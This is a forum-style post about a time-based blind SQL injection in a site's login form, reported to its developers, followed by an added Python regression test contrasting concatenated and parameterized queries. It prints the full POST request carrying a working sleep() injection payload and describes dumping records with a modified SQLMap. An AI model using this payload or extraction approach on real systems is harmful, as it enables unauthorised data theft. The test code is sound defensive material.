sql injection – SQLMap – Invalid character detected. retrying

I recently discovered a time-based blind SQL injection attack on one of the websites. I was able to dump the data with 100 threads (by default, SQLMap doesn’t allow more than 10, but I modified the source code) running in parallel at a rate of about 30 rows of records an hour.

POST /login HTTP/1.1
Host: somehost.com
Origin: https://somehost.com
Cookie: _session=AWFREYEH345gWwf4yyeGGwtw5ye987p520jwfREWT2qYKUYT43
Upgrade-Insecure-Requests: 1
Referer: https://somehost.com
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 81

username=CvtKevBJ'%2b(select*from(select(sleep(5)))a)%2b'&password=b2R%21e0p%21M5

3 days after I reported the issue, the developers mentioned that they had “applied a patch” and asked me to test again. The issue still existed. The payload above in the username field still caused a 5-second delay in the response; however, I could not extract the data at the same rate. It had significantly slowed down to some 3-ish records in 16 hours. SQLMap kept throwing this error:

(10:05:38) (ERROR) invalid character detected. retrying..
(10:05:38) (WARNING) increasing time delay to 23 seconds
(10:05:38) (ERROR) invalid character detected. retrying..
(10:05:38) (WARNING) increasing time delay to 24 seconds
(10:05:38) (ERROR) invalid character detected. retrying..
(10:05:38) (WARNING) increasing time delay to 25 seconds
(10:16:28) (ERROR) invalid character detected. retrying..
(10:16:28) (WARNING) increasing time delay to 26 seconds
(10:17:44) (ERROR) invalid character detected. retrying..
(10:17:44) (WARNING) increasing time delay to 27 seconds

I was wondering what patch it could have been.
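
A regression check for the retest described above, added here as an example and not part of the original post: it passes the username value from the request through a string-concatenated query and a parameterized one, and records whether `sleep()` is executed. The `users` table, the two login functions and the stubbed `sleep()` on in-memory SQLite are assumptions; the site's real backend is not shown on the page.

```python
import sqlite3
from urllib.parse import unquote_plus

# Username value from the request on this page, URL-decoded (%2b -> +).
PAYLOAD = unquote_plus("CvtKevBJ'%2b(select*from(select(sleep(5)))a)%2b'")


def make_db():
    """In-memory stand-in for the login table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-hash')")
    calls = []
    # SQLite has no sleep(); register a stub that records each call instead
    # of delaying, so the check is fast and deterministic (assumption).
    db.create_function("sleep", 1, lambda s: calls.append(s) or 0)
    return db, calls


def login_concatenated(db, username):
    """Vulnerable form: the input becomes part of the SQL text."""
    sql = "SELECT count(*) FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchone()[0]


def login_parameterized(db, username):
    """Fixed form: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT count(*) FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone()[0]


def sleep_calls(login):
    """Run one login attempt with PAYLOAD; return the recorded sleep() calls."""
    db, calls = make_db()
    login(db, PAYLOAD)
    return calls


if __name__ == "__main__":
    print("concatenated :", sleep_calls(login_concatenated))
    print("parameterized:", sleep_calls(login_parameterized))
```

A fix that only makes extraction slower would still leave the concatenated behaviour in place; the retest passes only when the payload produces no `sleep()` call at all.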